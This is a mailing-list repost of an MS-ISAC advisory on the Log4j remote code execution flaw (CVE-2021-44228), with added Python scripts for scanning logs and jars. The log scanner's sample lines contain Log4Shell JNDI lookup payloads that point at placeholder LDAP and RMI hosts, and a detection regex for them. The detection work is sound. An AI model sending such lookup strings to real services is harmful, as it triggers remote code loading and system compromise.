[CoIT-Security] UPDATED MS-ISAC CYBERSECURITY ADVISORY - A Vulnerability in Apache Log4j Could Allow for Arbitrary Code Execution - PATCH: NOW - TLP: WHITE

Goode, April april at onenet.net
Mon Dec 13 15:25:37 CST 2021


Good afternoon,

Chris has asked me to share this cybersecurity advisory from MS-ISAC.

Thanks,
April Goode, MBA, SPP
Director of OneNet Strategic Planning and Communications
Oklahoma State Regents for Higher Education
405.225.9251
april at onenet.net

Subject: CYBERSECURITY ADVISORY for Log4j Vulnerability

Please see the advisory below from MS-ISAC



TLP: WHITE

MS-ISAC CYBERSECURITY ADVISORY



MS-ISAC ADVISORY NUMBER:

2021-158 - UPDATED



DATE(S) ISSUED:

12/10/2021

12/13/2021 - UPDATED



SUBJECT:

A Vulnerability in Apache Log4j Could Allow for Arbitrary Code Execution



OVERVIEW:

A vulnerability has been discovered in Apache Log4j, a ubiquitous logging package for Java. Successful exploitation of this vulnerability could allow for arbitrary code execution within the context of the systems and services that use the Java logging library, including many services and applications written in Java. Depending on the privileges associated with these systems and services, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If these systems and services have been configured to have fewer user rights, exploitation of this vulnerability could have less impact than if they were configured with administrative rights.



THREAT INTELLIGENCE:

According to numerous open-source reports, Log4j is used with Apache software such as Apache Struts, Solr, and Druid, along with other technologies. Websites of many manufacturers and providers have been found to be affected, including Apple, Twitter, Steam, Tesla, and more. Threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or in trivial POST form data. In addition, it has been reported that organizations are already seeing signs of exploitation in the wild, with further attempts against other websites likely.



SYSTEMS AFFECTED:
*         Apache Log4j between versions 2.0 and 2.14.1



RISK:

Government:

  *   Large and medium government entities: High
  *   Small government entities: High

Businesses:

  *   Large and medium business entities: High
  *   Small business entities: High

Home users: High



TECHNICAL SUMMARY:

A vulnerability has been discovered in Apache Log4j, a ubiquitous logging package for Java. The vulnerability resides in the JNDI lookup feature of the log4j library, which allows variables to be retrieved via JNDI (Java Naming and Directory Interface), an API that provides naming and directory functionality to Java applications. While JNDI supports many naming services, the log4j lookup supports LDAP and RMI (Remote Method Invocation). An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.



Successful exploitation of this vulnerability could allow for arbitrary code execution within the context of the systems and services that use the Java logging library, including many services and applications written in Java. Depending on the privileges associated with these systems and services, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If these systems and services have been configured to have fewer user rights, exploitation of this vulnerability could have less impact than if they were configured with administrative rights.
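Because the advisory notes that payloads arrive in ordinary HTTP requests (a User-Agent header or form data) and are only dangerous once the value reaches a log call, a practical first detection step is to search web access logs for the lookup syntax. The script below is an added example, not part of the MS-ISAC advisory and not code from Apache; the log lines are constructed with documentation IP addresses, and the combined-log-format regex is an assumption about your server's log layout.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format, RFC 5737 documentation
# addresses). These are not real logs from the advisory or from any affected site.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [13/Dec/2021:10:02:11 -0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Dec/2021:10:02:12 -0600] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [13/Dec/2021:10:02:13 -0600] "POST /login HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [13/Dec/2021:10:02:14 -0600] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Log4j lookup syntax: "${", optional whitespace, "jndi", optional whitespace, ":",
# then the JNDI scheme (the advisory names ldap and rmi).
LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

# Apache/nginx "combined" log format (assumed layout for the sample lines).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def find_lookup_attempts(lines):
    """Return one finding per attacker-controlled field that carries a JNDI lookup."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("request", "referer", "ua"):
            raw = m.group(field)
            # Decode twice: the token is often URL-encoded, sometimes more than once.
            decoded = unquote(unquote(raw))
            hit = LOOKUP_RE.search(decoded)
            if hit:
                findings.append({
                    "ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "field": field,
                    "scheme": hit.group(1).lower(),
                    "http_status": int(m.group("status")),
                })
    return findings


def count_by_source(findings):
    """Aggregate findings per source address for triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_lookup_attempts(SAMPLE_ACCESS_LOG)
    for h in hits:
        print(f"{h['timestamp']} {h['ip']} field={h['field']} scheme={h['scheme']} status={h['http_status']}")
    print(count_by_source(hits))
```

Two caveats when running this against real logs: access logs do not record POST bodies, so the form-data case the advisory mentions needs WAF or application logs; and a hit records an attempt, not a successful lookup (the HTTP status code says nothing about whether the lookup fired), so pair it with alerts on outbound LDAP or RMI connections from application servers. Variants that assemble the token through other lookups will not match this regex, so treat its output as a floor.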



RECOMMENDATIONS:

We recommend the following actions be taken:

*        Apply the latest patches (version 2.15.0) provided by Apache after appropriate testing.

*        Run all systems and services as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.

*        Apply the Principle of Least Privilege to all systems and services.



December 13th - UPDATED RECOMMENDATIONS:
*         Run the "Log4Shell" Vulnerability Tester provided by Huntress to test whether your applications are vulnerable to CVE-2021-44228 (please see references for the Huntress link).
*         Check the GitHub repository listed in the reference section to see all the Security Advisories & Bulletins related to CVE-2021-44228, which include applications affected, version numbers, and the associated patches that should be implemented if you have the affected version in your environment.
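Both sets of recommendations come down to the same inventory question: which log4j-core jars are deployed, and is each one inside the affected 2.0 to 2.14.1 range or at the 2.15.0 patch level the advisory names? The scanner below is an added example, not the Huntress tool and not MS-ISAC or Apache code. It reads the version from the Maven pom.properties that log4j-core jars carry and also checks for the JndiLookup class, so a repackaged copy with no version metadata is still flagged. The sample jars it builds are constructed stand-ins, not real Apache artifacts, and the file paths inside the jar are assumptions based on standard Maven packaging.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Version boundaries as stated in the advisory: affected 2.0 through 2.14.1, patch 2.15.0.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)
PATCHED_MIN = (2, 15, 0)   # raise this when a later advisory names a newer fixed release

# Paths inside a log4j-core jar (assumed standard Maven layout).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0' -> (2, 0, 0); None if not a dotted version."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def read_log4j_version(zf):
    """Version of log4j-core from its pom.properties, or None if the file is absent."""
    if POM_PROPERTIES not in zf.namelist():
        return None
    for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "version":
            return parse_version(value)
    return None


def classify_log4j_jar(jar_path):
    """Classify one jar against the advisory's version range."""
    jar_path = Path(jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        has_jndi_lookup = JNDI_LOOKUP_CLASS in zf.namelist()
        version = read_log4j_version(zf)
    if version is not None and AFFECTED_MIN <= version <= AFFECTED_MAX:
        status = "vulnerable"
    elif version is not None and version >= PATCHED_MIN:
        status = "patched"  # the class is still shipped; the version decides
    elif version is not None:
        status = "outside-advisory-range"  # e.g. a 1.x jar; not covered by this advisory
    elif has_jndi_lookup:
        status = "jndi-lookup-present-version-unknown"  # shaded/repackaged copy: treat as suspect
    else:
        status = "not-log4j-core"
    return {"name": jar_path.name, "version": version,
            "jndi_lookup": has_jndi_lookup, "status": status}


def scan_directory(root):
    """One finding per .jar under root, recursively; unreadable archives are reported, not skipped."""
    findings = []
    for jar in sorted(Path(root).rglob("*.jar")):
        try:
            findings.append(classify_log4j_jar(jar))
        except zipfile.BadZipFile:
            findings.append({"name": jar.name, "version": None,
                             "jndi_lookup": False, "status": "unreadable"})
    return findings


def build_sample_jars(root=None):
    """Write constructed stand-in jars for the demo (not real Apache artifacts)."""
    root = Path(root) if root else Path(tempfile.mkdtemp(prefix="log4j-scan-"))
    samples = {
        "log4j-core-2.14.1.jar": ("2.14.1", True),
        "log4j-core-2.15.0.jar": ("2.15.0", True),
        "some-app-lib.jar": (None, False),
    }
    for name, (version, with_class) in samples.items():
        with zipfile.ZipFile(root / name, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            if version:
                zf.writestr(POM_PROPERTIES,
                            f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
            if with_class:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return root


if __name__ == "__main__":
    for f in scan_directory(build_sample_jars()):
        print(f"{f['status']:<38} {f['name']} version={f['version']}")
```

Point `scan_directory` at application and library directories on each host; it only opens top-level `.jar` files, so WAR and EAR archives, which nest jars inside `WEB-INF/lib`, need one extra level of recursion before the same classification applies. The version-unknown-but-class-present status exists because vendors ship shaded copies of log4j-core under their own artifact names, which is exactly the case the advisory's GitHub reference list of vendor bulletins is meant to cover.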



REFERENCES:



CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228



SANS Technology Institute:

https://isc.sans.edu/diary/28120



ZDNet:

https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/



Ars Technica:

https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/



December 13th - UPDATED REFERENCES:



GitHub:

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592



Huntress Log4Shell Tool:

https://log4shell.huntress.com/





Multi-State Information Sharing and Analysis Center (MS-ISAC)

Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC)

31 Tech Valley Drive

East Greenbush, NY 12061



24x7 Security Operations Center

SOC at cisecurity.org<mailto:SOC at cisecurity.org> - 1-866-787-4722


TLP: WHITE
https://www.cisa.gov/tlp
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.